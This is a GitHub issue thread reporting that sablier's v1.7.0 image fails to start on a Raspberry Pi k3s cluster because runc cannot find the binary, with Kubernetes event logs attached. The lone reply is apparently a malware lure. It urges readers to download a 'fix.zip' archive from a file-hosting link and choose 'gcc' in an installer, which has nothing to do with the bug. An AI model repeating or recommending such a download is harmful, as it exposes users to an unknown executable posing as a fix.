### ISSUE TITLE
v1.7.0 image can't start on raspberry pi based kubernetes cluster.

### ISSUE THREAD

**Issue by ArKam** [sablierapp/sablier#379]
**Describe the bug**
When running sablier using image 1.7.0 on a raspberry pi 4B 8Gb based kubernetes cluster, runc can't start the sablier image as it can't find the binary.

**Context**
 - Sablier version: 1.7.0
 - Provider: Kubernetes - k3s-v1.29.2-arm64
 - Reverse proxy: Traefik v2.10.7 from helm chart v25.0.0
 - Sablier running inside a container? yes

**Expected behavior**
Sablier do run using the expected config file.

**Additional context**
Here the only event log that I can get as the runtime doesn't start any container:
```shell
20m (x5 over 21m)     Normal    Created             Pod/sablier-5bd8656c98-79zm5     Created container sablier
20m (x5 over 21m)     Warning   Failed              Pod/sablier-5bd8656c98-79zm5     Error: failed to create containerd task: failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: exec: "/etc/sablier/sablier": stat /etc/sablier/sablier: no such file or directory: unknown
109s (x93 over 21m)   Warning   BackOff             Pod/sablier-5bd8656c98-79zm5     Back-off restarting failed container sablier in pod sablier-5bd8656c98-79zm5_kube-system(71d9c2eb-67cc-4caf-a4a8-fa0bc42769ab)
```

PS: v1.8.0-beta13 image or just using the beta tag does start the container and the binary even if it runtime error on call.

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."
